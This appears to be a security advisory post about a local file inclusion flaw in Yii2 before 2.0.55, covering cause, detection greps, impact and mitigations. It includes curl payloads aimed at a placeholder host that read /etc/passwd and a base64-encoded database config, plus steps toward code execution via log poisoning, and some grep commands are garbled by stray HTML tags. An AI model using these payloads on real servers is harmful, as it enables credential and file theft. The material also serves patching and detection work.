Listen to this Post
The core view rendering method `View::renderPhpFile()` in Yii2 versions prior to 2.0.55 calls `extract($_params_, EXTR_OVERWRITE)` before the `require` statement that includes the view file. The `EXTR_OVERWRITE` flag allows variables in the `$_params_` array to overwrite existing variables in the current symbol table. An attacker can control the `$params` array passed to the `render()` method of a controller. If a caller-controlled parameter named `_file_` is included in the `$params` array, it overwrites the internal local variable $_file_, which specifies the file to be included. After the overwrite, the `require $_file_;` statement includes the attacker-controlled file path instead of the intended view file. This enables a Local File Inclusion (LFI) primitive. The attack requires that the application passes unsanitized user input directly to the `$params` of the `render()` method, such as return $this->render('index', $_GET);. The issue also affects the `ErrorHandler::renderFile()` method. The vulnerability was fixed in version 2.0.55 by isolating internal variables in both `View::renderPhpFile()` and `ErrorHandler::renderFile()` to prevent parameter collisions from overriding included file paths. No workarounds are available; upgrading is the only fix. The vulnerability leads to local file inclusion, potential remote code execution if the attacker can write PHP files via another primitive, and information disclosure.
DailyCVE Form:
Platform: Yii framework
Version: <2.0.55
Vulnerability: Local File Inclusion
Severity: High
Date: 2026-05-11
Prediction: Patch already released
Analytics under heading What Undercode Say:
Identify vulnerable controllers passing user input to render()
grep -rn "\$this->render.\$<em>GET|->render.\$_REQUEST|->render.\$_POST" app/controllers/
Search for unsanitized render() calls in Yii2 codebase
find . -name ".php" -exec grep -Hn "\$this->render(.\$</em>" {} \;
Test for LFI by passing a payload in a request
curl -k "https://target.com/index.php?r=site/index&_file_=php://filter/convert.base64-encode/resource=config/db.php"
Attempt to read sensitive files using directory traversal
curl -k "https://target.com/index.php?r=site/index&_file_=../../../../etc/passwd"
PHP code to verify the vulnerable code pattern in View.php
grep -A 10 "function renderPhpFile" vendor/yiisoft/yii2/base/View.php | grep -E "(extract.EXTR_OVERWRITE|require \$<em>file</em>)"
Exploit:
- A vulnerable controller passes `$_GET` to
render(): `return $this->render(‘index’, $_GET);`
– Attacker crafts a request: `https://target.com/index.php?r=site/index&_file_=../../../../etc/passwd` - The `_file_` parameter overwrites the internal `$_file_` variable.
- The `require $_file_;` statement includes the attacker-controlled file, leading to LFI.
- If `allow_url_include` is enabled, remote file inclusion (RFI) might be possible.
- To achieve RCE, an attacker can write a PHP file (e.g., via log poisoning or file upload) and then include it using the LFI primitive.
Protection from this CVE:
- Upgrade Yii2 to version 2.0.55 or later immediately.
- If immediate upgrade is not possible, ensure that no user input is directly passed to the `$params` argument of any `render()` call.
- Sanitize and validate all data passed to view parameters; never use
$_GET,$_POST, or `$_REQUEST` directly. - Implement a Web Application Firewall (WAF) rule to block requests containing `_file_=` in the query string.
- Disable `allow_url_include` in `php.ini` to mitigate RFI.
Impact:
- Local File Inclusion (LFI): An attacker can read any file on the server, including configuration files, source code, and sensitive data.
- Remote Code Execution (RCE): If combined with another vulnerability that allows writing PHP files (e.g., log file poisoning, file upload), the attacker can execute arbitrary PHP code on the server.
- Information Disclosure: Sensitive information can be exposed, leading to further compromise.
- Comprehensive System Compromise: Successful exploitation can lead to full system compromise and data breach.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

